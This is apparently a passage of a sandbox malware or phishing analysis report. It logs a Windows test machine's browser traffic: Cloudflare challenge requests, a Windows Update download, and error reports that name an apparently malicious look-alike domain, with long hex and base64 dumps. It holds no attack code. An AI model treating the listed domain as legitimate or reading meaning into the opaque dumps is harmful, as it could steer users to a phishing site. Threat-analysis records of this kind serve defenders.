                                                                                                                                                Data Ascii: YedeZtykqulcHWqi7q3vap2qJ68j5acv46EuYeUxJrNpLChqpylp52nkraVy9iprpycrNzdneG51LW7n7LFxqSt6Mnxx/DT6ePDwum6tdC2vtrYucH07wfV7/AA+dkJA9ru8P3QCeYT7OsN1hkSCNgU1iD0IBMdBCMb4fEmCN4HJgYbKAsy/Qcn7zYkGfocFzs5QS80MhQSNBwqHSk5TgUNPiZQPVMLUxcmIic6VTAoGFweNCFWUlsdHzlhX19Y
                                                                                                                                                2024-10-28 16:48:05 UTC1369INData Raw: 79 4e 6a 34 65 67 65 62 71 30 72 5a 4f 32 64 37 43 69 73 36 2b 4e 6f 71 43 32 6f 35 37 49 74 62 36 64 6e 4d 6d 4f 70 4d 50 46 7a 36 71 68 79 5a 47 72 79 37 66 53 73 4e 69 52 34 4b 6d 68 73 35 79 2f 73 71 4b 6f 31 61 54 69 37 4f 44 4a 72 71 7a 46 35 61 6e 72 30 4d 48 69 34 65 6e 34 77 38 6a 77 36 74 61 36 37 2f 48 32 78 4d 44 41 77 76 76 30 38 2f 33 31 33 51 54 6b 33 64 33 78 44 67 6f 44 45 4f 34 59 31 2b 4d 63 43 4d 38 4c 37 76 66 59 48 2b 45 50 33 79 48 64 4b 4f 4d 57 43 2b 50 6c 47 77 73 6a 35 77 73 55 41 65 66 73 43 2f 41 43 4a 66 55 57 39 54 6e 35 4c 50 4d 59 47 79 4d 41 47 2f 34 57 41 79 41 39 4a 51 6f 6d 52 53 59 4f 4b 54 4d 50 44 77 31 56 56 42 46 4a 52 54 49 57 53 79 74 56 49 6a 6f 65 4a 52 30 5a 48 69 6b 68 5a 6d 46 45 4a 69 46 4c 4b 54 42 4c 51
                                                                                                                                                Data Ascii: yNj4egebq0rZO2d7Cis6+NoqC2o57Itb6dnMmOpMPFz6qhyZGry7fSsNiR4Kmhs5y/sqKo1aTi7ODJrqzF5anr0MHi4en4w8jw6ta67/H2xMDAwvv08/313QTk3d3xDgoDEO4Y1+McCM8L7vfYH+EP3yHdKOMWC+PlGwsj5wsUAefsC/ACJfUW9Tn5LPMYGyMAG/4WAyA9JQomRSYOKTMPDw1VVBFJRTIWSytVIjoeJR0ZHikhZmFEJiFLKTBLQ
                                                                                                                                                2024-10-28 16:48:05 UTC1369INData Raw: 74 64 34 57 6d 76 33 31 39 69 70 65 52 67 38 4b 38 78 73 47 33 6c 35 6d 4b 70 4d 69 73 6a 34 69 7a 6f 59 32 73 79 4e 6d 59 30 70 47 53 31 74 65 59 33 65 44 63 77 71 7a 68 6e 4a 6e 6e 34 39 54 4b 75 2b 75 73 6f 61 79 6e 73 4f 47 39 37 73 6e 77 36 73 48 34 32 76 69 36 36 38 6e 33 77 4e 72 69 2b 73 49 43 34 67 62 4a 2b 4f 72 6f 79 75 58 6d 45 51 76 49 78 64 41 53 41 65 55 51 47 42 58 79 32 68 30 59 33 65 30 61 44 66 62 78 48 79 44 67 4a 76 45 54 4c 4f 6e 70 39 67 54 39 37 79 38 70 4d 79 34 6b 42 41 62 32 45 54 55 5a 2b 2f 51 67 44 76 6b 5a 4e 55 59 46 50 2f 33 2b 52 6a 52 42 47 30 30 33 52 52 39 51 55 46 45 69 56 55 45 75 55 46 67 75 47 56 6c 57 58 53 35 62 58 6c 38 38 4d 43 39 54 4a 6d 41 70 50 57 46 73 4e 31 74 68 61 53 70 4a 4b 69 34 2f 59 6c 4e 76 4f 54
                                                                                                                                                Data Ascii: td4Wmv319ipeRg8K8xsG3l5mKpMisj4izoY2syNmY0pGS1teY3eDcwqzhnJnn49TKu+usoaynsOG97snw6sH42vi668n3wNri+sIC4gbJ+OroyuXmEQvIxdASAeUQGBXy2h0Y3e0aDfbxHyDgJvETLOnp9gT97y8pMy4kBAb2ETUZ+/QgDvkZNUYFP/3+RjRBG003RR9QUFEiVUEuUFguGVlWXS5bXl88MC9TJmApPWFsN1thaSpJKi4/YlNvOT
                                                                                                                                                2024-10-28 16:48:05 UTC1369INData Raw: 6c 6f 36 52 76 59 57 77 6c 4d 62 45 6d 70 72 4b 6a 61 36 64 7a 73 79 37 7a 64 54 51 70 59 72 58 31 4d 4f 53 33 4c 4b 71 72 2b 43 66 34 4c 4c 69 33 35 32 78 35 39 53 36 75 75 79 74 77 72 37 70 73 64 4c 43 38 38 72 43 78 2f 6a 6b 79 73 6a 37 2b 4f 76 35 41 65 7a 61 7a 67 54 76 78 64 49 49 39 50 6a 59 44 4f 41 4e 33 52 44 6d 37 75 4d 55 31 4d 33 69 46 78 58 36 36 68 62 64 2f 64 59 68 44 52 48 77 4a 65 55 48 38 79 6b 6c 46 43 59 74 41 77 2f 36 4c 79 33 2b 41 54 58 30 37 51 67 35 39 7a 6b 4a 50 52 4d 58 43 30 41 58 45 78 42 45 47 78 4d 58 51 67 6f 6e 46 30 31 4a 48 79 42 51 50 53 59 4c 56 56 45 69 55 6c 6b 76 4b 79 78 64 48 6a 73 72 59 55 77 61 4e 47 51 6b 5a 54 52 70 4b 53 6f 34 62 47 6b 37 50 32 39 74 59 43 64 75 4e 6c 64 42 65 48 56 54 53 6e 31 54 57 30 79
                                                                                                                                                Data Ascii: lo6RvYWwlMbEmprKja6dzsy7zdTQpYrX1MOS3LKqr+Cf4LLi352x59S6uuytwr7psdLC88rCx/jkysj7+Ov5AezazgTvxdII9PjYDOAN3RDm7uMU1M3iFxX66hbd/dYhDRHwJeUH8yklFCYtAw/6Ly3+ATX07Qg59zkJPRMXC0AXExBEGxMXQgonF01JHyBQPSYLVVEiUlkvKyxdHjsrYUwaNGQkZTRpKSo4bGk7P29tYCduNldBeHVTSn1TW0y
                                                                                                                                                2024-10-28 16:48:05 UTC1369INData Raw: 63 6d 63 69 4d 58 4e 78 35 36 4d 30 71 66 49 71 4d 2f 41 30 39 54 52 6d 72 72 47 6c 4d 6e 58 33 4e 6d 69 75 73 36 63 30 64 2f 6b 34 61 6e 66 71 61 54 41 37 4d 48 74 34 4d 33 78 39 64 37 30 78 66 4c 31 37 63 6a 32 76 66 50 35 41 66 7a 64 41 62 37 65 34 51 59 4b 38 67 6e 5a 44 66 62 4d 43 73 33 51 43 75 45 50 31 51 77 53 47 78 54 71 38 39 59 48 31 66 59 63 44 75 34 47 4a 2b 54 32 41 53 4d 6a 36 43 59 75 47 43 6b 44 4b 76 45 73 38 54 62 7a 4e 51 77 32 4e 54 77 32 50 78 49 32 44 6a 73 43 2f 44 35 47 47 51 56 43 53 7a 52 46 49 30 59 4f 44 51 35 54 45 46 45 73 55 6c 49 69 55 68 45 75 55 69 70 58 48 6c 42 61 48 69 41 69 49 68 34 38 61 54 67 6a 5a 47 49 36 5a 79 38 36 61 69 70 49 64 55 51 76 62 7a 56 79 4d 6c 42 39 53 7a 64 34 64 6b 35 37 51 6a 5a 2b 50 6c 79 4a
                                                                                                                                                Data Ascii: cmciMXNx56M0qfIqM/A09TRmrrGlMnX3Nmius6c0d/k4anfqaTA7MHt4M3x9d70xfL17cj2vfP5AfzdAb7e4QYK8gnZDfbMCs3QCuEP1QwSGxTq89YH1fYcDu4GJ+T2ASMj6CYuGCkDKvEs8TbzNQw2NTw2PxI2DjsC/D5GGQVCSzRFI0YODQ5TEFEsUlIiUhEuUipXHlBaHiAiIh48aTgjZGI6Zy86aipIdUQvbzVyMlB9Szd4dk57QjZ+PlyJ


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                47192.168.2.1649777104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:48:06 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/529245995:1730132305:Laa5oq2m73aFLJir1YIIar-kFQTXq6O2pduGpfcbM2U/8d9c69278df22e27/PxLt5hfjqiTPx0sjtRTM1yJo9d0uOquA7rEns6f87xg-1730134078-1.1.1.1-IuqPdMWPk2MuuPdmgmf36o4gSheMJLGvteZUcwaHmaE8n7ftlDUr4X5m_WkV.81V HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:48:06 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 28 Oct 2024 16:48:06 GMT
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Content-Length: 7
                                                                                                                                                Connection: close
                                                                                                                                                cf-chl-out: nGoBKTo/ctBfhLJU0DOtXrwyaQ33+bNKv8Y=$6zW6KwPgXt3p2pQd
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6958e9182e63-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:48:06 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                Data Ascii: invalid


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                48192.168.2.1649778172.202.163.200443
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:48:16 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=612cNYgATxTDloo&MD=Z6lemAgC HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                                                2024-10-28 16:48:16 UTC560INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Expires: -1
                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                MS-CorrelationId: d46035d1-d37a-40ed-a439-ed6c6990dcd3
                                                                                                                                                MS-RequestId: 39d13a77-0b08-486c-8bf1-910d7e3b4165
                                                                                                                                                MS-CV: MvviVRc1NUqU2kDL.0
                                                                                                                                                X-Microsoft-SLSClientCache: 1440
                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                Date: Mon, 28 Oct 2024 16:48:16 GMT
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 30005
                                                                                                                                                2024-10-28 16:48:16 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                2024-10-28 16:48:16 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                49192.168.2.164978035.190.80.14436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:48:31 UTC593OUTOPTIONS /report/v4?s=dKl9aCl%2FSkgF%2FN25ePb1xCna3q7H99Ks92%2FGL65hfERtBAgm22Bdcs5D1niJ0Xqv%2FPb%2FTAL4uCdGDaEI9H5Eo8Qxc7asvoq1aiWWP6yWF4b036O72UBV3HKpCnFVc0beG93S%2FmOXFU%2FdmLlgvN2vakxtHLgqLJk%3D HTTP/1.1
                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Origin: https://vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:48:31 UTC336INHTTP/1.1 200 OK
                                                                                                                                                Content-Length: 0
                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                access-control-allow-methods: OPTIONS, POST
                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                access-control-allow-headers: content-type, content-length
                                                                                                                                                date: Mon, 28 Oct 2024 16:48:31 GMT
                                                                                                                                                Via: 1.1 google
                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                Connection: close


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                50192.168.2.164978135.190.80.14436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:48:31 UTC593OUTOPTIONS /report/v4?s=Wkjr9bhACmWCdQsb5KgILKYa7Sic9lFafA3%2Fe2UarypavvCSB%2FwHZf5JuwMPHzNq7qlETp3KSmsFWTZoGmq69ocVLjMRxIjOC%2FLtsOsPb9cOg1SHZ%2BSSrL%2B4dRscMJwIrVNfU8iANNVzpjhm%2FKR6fphj4%2FmQxEE%3D HTTP/1.1
                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Origin: https://vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:48:31 UTC336INHTTP/1.1 200 OK
                                                                                                                                                Content-Length: 0
                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                access-control-allow-methods: POST, OPTIONS
                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                access-control-allow-headers: content-type, content-length
                                                                                                                                                date: Mon, 28 Oct 2024 16:48:31 GMT
                                                                                                                                                Via: 1.1 google
                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                Connection: close


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                51192.168.2.164978335.190.80.14436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:48:31 UTC515OUTPOST /report/v4?s=Wkjr9bhACmWCdQsb5KgILKYa7Sic9lFafA3%2Fe2UarypavvCSB%2FwHZf5JuwMPHzNq7qlETp3KSmsFWTZoGmq69ocVLjMRxIjOC%2FLtsOsPb9cOg1SHZ%2BSSrL%2B4dRscMJwIrVNfU8iANNVzpjhm%2FKR6fphj4%2FmQxEE%3D HTTP/1.1
                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Content-Length: 1315
                                                                                                                                                Content-Type: application/reports+json
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:48:31 UTC1315OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 35 32 31 34 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 37 37 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 76 6f 6b 62 7a 2d 69 61 6d 67 6f 6c 64
                                                                                                                                                Data Ascii: [{"age":35214,"body":{"elapsed_time":771,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":404,"type":"http.error"},"type":"network-error","url":"https://vokbz-iamgold
                                                                                                                                                2024-10-28 16:48:32 UTC168INHTTP/1.1 200 OK
                                                                                                                                                Content-Length: 0
                                                                                                                                                date: Mon, 28 Oct 2024 16:48:31 GMT
                                                                                                                                                Via: 1.1 google
                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                Connection: close


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                52192.168.2.164978235.190.80.14436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:48:31 UTC514OUTPOST /report/v4?s=dKl9aCl%2FSkgF%2FN25ePb1xCna3q7H99Ks92%2FGL65hfERtBAgm22Bdcs5D1niJ0Xqv%2FPb%2FTAL4uCdGDaEI9H5Eo8Qxc7asvoq1aiWWP6yWF4b036O72UBV3HKpCnFVc0beG93S%2FmOXFU%2FdmLlgvN2vakxtHLgqLJk%3D HTTP/1.1
                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Content-Length: 886
                                                                                                                                                Content-Type: application/reports+json
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:48:31 UTC886OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 32 35 33 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 33 34 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 76 6f 6b 62 7a 2d 69 61 6d 67 6f 6c 64 2e 6d 6f 62 69 6c 65 2d 70 64 66 71 72 6f 6e 6c 69 6e 65 2e 63 6f 6d 2f 31 31 33 38 34 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c
                                                                                                                                                Data Ascii: [{"age":52532,"body":{"elapsed_time":2343,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://vokbz-iamgold.mobile-pdfqronline.com/11384/","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":200,"type":"abandoned"},
                                                                                                                                                2024-10-28 16:48:32 UTC168INHTTP/1.1 200 OK
                                                                                                                                                Content-Length: 0
                                                                                                                                                date: Mon, 28 Oct 2024 16:48:31 GMT
                                                                                                                                                Via: 1.1 google
                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                Connection: close


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                53192.168.2.1649786104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:12 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/529245995:1730132305:Laa5oq2m73aFLJir1YIIar-kFQTXq6O2pduGpfcbM2U/8d9c69278df22e27/PxLt5hfjqiTPx0sjtRTM1yJo9d0uOquA7rEns6f87xg-1730134078-1.1.1.1-IuqPdMWPk2MuuPdmgmf36o4gSheMJLGvteZUcwaHmaE8n7ftlDUr4X5m_WkV.81V HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Content-Length: 33672
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                CF-Challenge: PxLt5hfjqiTPx0sjtRTM1yJo9d0uOquA7rEns6f87xg-1730134078-1.1.1.1-IuqPdMWPk2MuuPdmgmf36o4gSheMJLGvteZUcwaHmaE8n7ftlDUr4X5m_WkV.81V
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/inwdh/0x4AAAAAAAjGd7wY-0w5WfUZ/auto/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:12 UTC16384OUTData Raw: 76 5f 38 64 39 63 36 39 32 37 38 64 66 32 32 65 32 37 3d 42 52 57 77 63 53 73 4f 50 75 57 73 52 25 32 62 62 36 39 73 63 58 2d 47 75 73 67 58 4c 78 77 4b 77 79 52 36 72 58 76 77 53 43 78 53 32 4d 58 34 77 2d 6f 58 56 58 51 77 55 6f 77 58 24 57 79 58 66 77 4a 7a 24 58 65 4a 44 50 73 46 65 4a 67 58 58 2d 58 75 6f 73 54 79 58 2b 54 66 78 45 58 65 66 58 54 77 47 4f 58 50 45 78 45 45 47 58 4a 44 52 73 49 58 57 57 58 33 58 57 49 2d 57 44 49 77 53 68 2b 66 35 55 6e 4a 38 64 58 73 44 77 73 59 75 57 70 44 58 65 54 51 58 53 33 39 78 35 67 73 64 7a 57 58 46 77 36 51 74 58 58 6e 52 54 65 38 4f 64 58 39 50 35 67 51 62 51 2b 39 79 53 44 67 49 57 70 66 58 73 51 39 58 58 52 58 45 6e 51 44 54 74 77 7a 2b 63 44 44 48 76 70 47 67 7a 62 58 6e 6a 4e 68 50 6a 56 42 4c 7a 24 47
                                                                                                                                                Data Ascii: v_8d9c69278df22e27=BRWwcSsOPuWsR%2bb69scX-GusgXLxwKwyR6rXvwSCxS2MX4w-oXVXQwUowX$WyXfwJz$XeJDPsFeJgXX-XuosTyX+TfxEXefXTwGOXPExEEGXJDRsIXWWX3XWI-WDIwSh+f5UnJ8dXsDwsYuWpDXeTQXS39x5gsdzWXFw6QtXXnRTe8OdX9P5gQbQ+9ySDgIWpfXsQ9XXRXEnQDTtwz+cDDHvpGgzbXnjNhPjVBLz$G
                                                                                                                                                2024-10-28 16:49:12 UTC16384OUTData Raw: 44 58 58 53 48 6d 58 2d 50 47 50 53 78 36 24 73 7a 64 55 78 62 58 42 6f 2b 6f 53 75 58 38 34 47 64 58 62 64 65 70 75 50 44 44 58 2d 6c 6e 6c 52 56 77 35 77 66 58 70 57 58 51 58 55 50 36 48 43 41 77 36 57 58 78 58 6f 4c 42 64 73 24 58 64 64 2b 58 73 46 77 34 77 79 24 36 4b 58 64 77 53 57 73 33 69 72 77 58 50 73 56 58 57 58 43 50 53 7a 58 61 77 55 50 53 53 58 54 77 47 6f 53 56 58 62 58 58 52 36 54 43 2b 77 65 7a 44 35 77 6b 77 43 58 36 33 58 78 58 73 4f 53 38 58 6e 58 73 63 53 64 39 47 4b 2b 6c 71 66 73 6e 58 47 4b 58 47 58 62 58 47 52 58 48 77 77 77 46 34 75 77 58 2d 58 39 58 53 46 75 7a 46 43 6d 69 6d 58 56 52 79 45 73 70 73 4b 77 74 57 2b 53 58 38 77 57 47 71 75 58 67 58 58 50 70 6f 58 42 70 43 48 63 4c 64 49 58 4f 45 39 33 52 69 47 58 49 71 63 50 64 6b
                                                                                                                                                Data Ascii: DXXSHmX-PGPSx6$szdUxbXBo+oSuX84GdXbdepuPDDX-lnlRVw5wfXpWXQXUP6HCAw6WXxXoLBds$Xdd+XsFw4wy$6KXdwSWs3irwXPsVXWXCPSzXawUPSSXTwGoSVXbXXR6TC+wezD5wkwCX63XxXsOS8XnXscSd9GK+lqfsnXGKXGXbXGRXHwwwF4uwX-X9XSFuzFCmimXVRyEspsKwtW+SX8wWGquXgXXPpoXBpCHcLdIXOE93RiGXIqcPdk
